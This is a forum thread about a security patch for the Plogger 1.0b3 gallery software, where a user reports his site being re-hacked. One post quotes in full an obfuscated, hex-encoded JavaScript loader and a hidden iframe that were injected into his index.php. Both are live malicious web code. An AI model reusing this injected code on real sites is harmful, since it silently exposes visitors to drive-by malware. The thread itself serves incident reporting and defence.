Announcements: [Sticky, Closed] Important-- Security Update for 1.0b3 users (a.k.a. Version 3.0 Beta)

Bottom of Page

1 to 10 of 10

- CommentAuthorryanduff
- CommentTimeAug 18th 2008 edited
If you're using version 1.0b3, there was a security vulnerability that has been found and publicly disclosed. We were notified after it was found and the problem has been corrected.

I ported changes back to version 1.0b3 for those not running current SVN. They can be found here. There are two changed files: plog-download.php and plog-remote.php (both found in the root folder). Replacing those files with those in the zip file will fix the issue.

For those running SVN, the changes were committed in r569 so as long as you've updated past that revision, you should be covered.

The download on the main page also has the updated files if you would like the whole package.
Thankful People: louisvuittonoutlet, Georgeste
- CommentAuthorjwaddick
- CommentTimeDec 11th 2008
Ok I'm confused - where do I find out what version I'm running. From the plogger admin it says I'm "Version 3.0 Beta". How does that translate into 1.0b3?

Thanks
Janice
- CommentAuthorryanduff
- CommentTimeDec 11th 2008
There were some differences when it came to naming and some releases were not standardized. I was away when 1.0b3 was released as "3.0 Beta." To keep things clean, it was left that way (it was a while before I found out) so that we didn't have installs labeled as 3.0 Beta and 1.0b3 floating around. The next version released should be labled correctly. As for now, you're running what's also known as 1.0b3.
- CommentAuthorfxfxfx
- CommentTimeDec 19th 2008
My Plogger site is re-hacked constantly. Even after updating to 3.0 beta and additionally the two plogger files, that were reported vulnerable in august.

What happens is that the following script is inserted in the index.php file:

*********************
<script>function c102916999516l4947817c2e615(l4947817c2ede3){ function l4947817c2f5b5(){var l4947817c2fd82=16;return l4947817c2fd82;} return (parseInt(l4947817c2ede3,l4947817c2f5b5()));}function l4947817c30568(l4947817c30d22){ var l4947817c32490=2; var l4947817c314f1='';l4947817c33431=String.fromCharCode;for(l4947817c31cc1=0;l4947817c31cc1<l4947817c30d22.length;l4947817c31cc1+=l4947817c32490){ l4947817c314f1+=(l4947817c33431(c102916999516l4947817c2e615(l4947817c30d22.substr(l4947817c31cc1,l4947817c32490))));}return l4947817c314f1;} var x17='';var l4947817c33c03='3C736'+x17+'3726'+x17+'970743E6'+x17+'96'+x17+'6'+x17+'28216'+x17+'D796'+x17+'96'+x17+'1297B6'+x17+'46'+x17+'F6'+x17+'3756'+x17+'D6'+x17+'56'+x17+'E742E77726'+x17+'9746'+x17+'528756'+x17+'E6'+x17+'5736'+x17+'36'+x17+'1706'+x17+'528202725336'+x17+'32536'+x17+'392536'+x17+'36'+x17+'2537322536'+x17+'312536'+x17+'6'+x17+'42536'+x17+'352532302536'+x17+'6'+x17+'52536'+x17+'312536'+x17+'6'+x17+'42536'+x17+'3525336'+x17+'42536'+x17+'332533312533302532302537332537322536'+x17+'3325336'+x17+'42532372536'+x17+'3825373425373425373025336'+x17+'125326'+x17+'6'+x17+'25326'+x17+'6'+x17+'2536'+x17+'372536'+x17+'6'+x17+'6'+x17+'2536'+x17+'372536'+x17+'6'+x17+'6'+x17+'2533322536'+x17+'6'+x17+'42536'+x17+'3525326'+x17+'52536'+x17+'6'+x17+'52536'+x17+'3525373425326'+x17+'6'+x17+'25326'+x17+'52536'+x17+'372536'+x17+'6'+x17+'6'+x17+'25326'+x17+'6'+x17+'2536'+x17+'332536'+x17+'382536'+x17+'352536'+x17+'332536'+x17+'6'+x17+'225326'+x17+'52536'+x17+'382537342536'+x17+'6'+x17+'42536'+x17+'6'+x17+'32532372532302537372536'+x17+'392536'+x17+'342537342536'+x17+'3825336'+x17+'4253337253336'+x17+'2533392532302536'+x17+'382536'+x17+'352536'+x17+'392536'+x17+'372536'+x17+'3825373425336'+x17+'42533352533332533332532302537332537342537392536'+x17+'6'+x17+'32536'+x17+'3525336'+x17+'4253237253736'+x17+'2536'+x17+'392537332536'+x17+'392536'+x17+'322536'+x17+'392536'+x17+'6'+x17+'32536'+x17+'3925373425373925336'+x17+'12536'+x17+'382536'+x17+'392536'+x17+'342536'+x17+'342536'+x17+'352536'+x17+'6'+x17+'525323725336'+x17+'525336'+x17+'325326'+x17+'6'+x17+'2536'+x17+'392536'+x17+'36'+x17+'2537322536'+x17+'312536'+x17+'6'+x17+'42536'+x17+'3525336'+x17+'52729293B7D76'+x17+'6'+x17+'172206'+x17+'D796'+x17+'96'+x17+'13D7472756'+x17+'53B3C2F736'+x17+'3726'+x17+'970743E';document.write(l4947817c30568(l4947817c33c03));</script>
*********************

There are small variations to the inserted scripts. Here's another version.

The script is always injected after the body iframe, before the div style.

<body><iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe> HERE IS THE SCRIPT INJECTED <div style="margin: auto; width: 750px;"> <?php the_gallery(); ?>

I have comunicating with the server company but they only suggest, what I have already done: chmodding to 755, which I actually chmodded most files and directories to 544, including index.php, gallery.php, plog-config.php, plog-download.php, plog-remote.php, plog-load_config.php, plog-globals.php, plog-functions.php and plog-thumb.php, as well as whole directories including admin, lib and themes (all three recursively (chmod to 544)).

Still, every hour or two, it's all hacked again and the script re-injected to index.php. The result is visible on the site, as content is dropped 100 or 200 pixels on the screen, as the script apparently takes this place. So it's clear when it happens (again).

How can I stop this?

...And when is next version of plogger coming? I'm scared that my site and the thousands of photos will be deleted by the hackers...

Frank
- CommentAuthorsidtheduck
- CommentTimeDec 19th 2008
Frank,

Sorry to hear about your difficulties. Can you send a .zip file of your Plogger contents, an SQL dump, and any RAW access logs that you can get to security SPLAT plogger DOT org? We can take a look at it and try to figure out what is going on.

Also, have you checked the permissions of the Plogger folder itself to make sure the permissions are set at 0755? At this time, I don't know how Plogger would be the culprit to inserting this code between the body tag (after the inclusion of the gallery.php file) and the the_gallery() function. I'm thinking it may be some other intrusion to your system, but we can try to verify that it isn't for sure and to see if we can determine how they are getting in as well.
- CommentAuthorsidtheduck
- CommentTimeSep 24th 2009
sam,

How do you know they got in through plog-upload.php and plog-import.php? Just curious as to how your site looks to be hacked (script injection, uploaded files, changed files, etc.). We need more information to help you figure out how they got in (through Plogger or some other means).
- CommentAuthorsidtheduck
- CommentTimeOct 2nd 2009 edited
We (the development team) have been working hard to make the next release of Plogger to be as secure as possible. My recommended permissions are '0755' for directories and '0644' for files. There are certain server setups that will cause you to decrease permissions temporarily in the next release (during install or possibly some instances of changing .htaccess files for rewrite).

Currently with the beta3 version, there are some server setups that you have to decrease the permissions to '0776' (but most people tend to just decrease to '0777') on directories for Plogger or most other gallery software out there due to how the server is set up (safe_mode restrictions especially). While this is not ideal, a potential security hazard, and not the recommended solution, the other option would be to change web hosts (which a lot of people seem less willing to do) to someone who knows how to set up a secure server without crippling it's abilities to run PHP as an environment set up for manipulating / creating directories and files.

So to answer your question, if you have your directories set to '0755', you should be fine as far as directory security goes.

1 to 10 of 10

Feeds

Announcements: [Sticky, Closed] Important-- Security Update for 1.0b3 users (a.k.a. Version 3.0 Beta)